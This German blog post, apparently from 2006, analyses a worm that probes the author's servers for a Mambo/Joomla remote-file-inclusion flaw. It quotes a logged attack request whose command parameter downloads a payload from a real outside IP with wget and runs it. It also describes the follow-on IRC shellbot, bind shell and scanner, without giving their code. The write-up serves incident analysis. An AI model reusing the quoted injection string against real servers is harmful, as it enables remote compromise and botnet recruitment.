Neuer Mambo-Wurm?

Beim Blick in die Logfiles fielen verschiedene Logeinträge auf - irgendjemand (oder -etwas) sucht nach einer seit November bekannten Schwachstelle im Mambo/Joomla CMS. Es gab bereits einen Wurm, der diese Lücke ausnutzt: ElxBot suchte allerdings via Google nach verwundbaren Servern. Da auf meinen Kisten jedoch kein Mambo installiert ist, können meine Maschinen wohl kaum via Google als solche identifiziert werden...
Update: Wähend McAfee nur die allgemeinen Viren-/Wurm-Teile identifizieren konnte, brachte der Online-Scanner von Kaspersky näheres zu Tage: Er identifizierte das Binary mit der Kernfunktionalität als Net-Worm.Linux.Mare.d alias Linux/Lupper-H - bekannt seit drei Tagen. Trotzdem war das Erstellen der folgenden Analyse recht interessant.

Die Logeinträge sehen folgendermaßen aus (gesucht wird in weiteren Pfaden):
xxx.xxx.xxx.xxx - - [19/Feb/2006:08:19:20 +0100] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://198.170.105.69/c.gif?&
cmd=cd%20/tmp;wget%20198.170.105.69/supina;chmod%20744%20supina;
./supina;echo%20YYY;echo| HTTP/1.1"

Aus Neugierde habe ich einmal "Mambo gespielt" und die angegebene Datei "supina" vom Server 198.170.105.69 heruntergeladen. Obwohl der Scan bereits einen Tag her war, war der Server noch immer erreichbar...
Sie enthält ein bash-Skript, das zunächst das /tmp-Verzeichnis leert und anschließend mittels wget und curl vom selben Server weitere Dateien nachläd:
"cb" ist ein Binary, das vom McAfee-Scanner als Linux/Rst.b virus klassifiziert wird.
Ein Perl-Skript namens "https" (als "Perl/Shellbot trojan" identifiziert) öffnet einen IRC-Channel des undernet-IRC-Netzwerks, umd auf weitere Kommandos zu warten.
Ein weiteres Perl-Skript namens "ping.txt" bindet eine Shell (/bin/sh) an Port 8080.
Zu guter letzt wird ein 400k großes Linux-Binary namens httpd nachgeladen und gestartet; ich habe es zwar nicht mit einem Debugger analysiert, die Ausgabe von "strings" läßt jedoch folgende Vermutungen zu: Es scannt nach weiteren verwundbaren Hosts, und zwar sowohl nach Mambo-Installationen als auch nach verschiedenen Blogg-Systemen mit der XMLRPC-Schwachstelle. Desweiteren gibt es Statusmeldungen, die irgendeine Update-Möglichkeit vermuten lassen.

comments powered by Disqus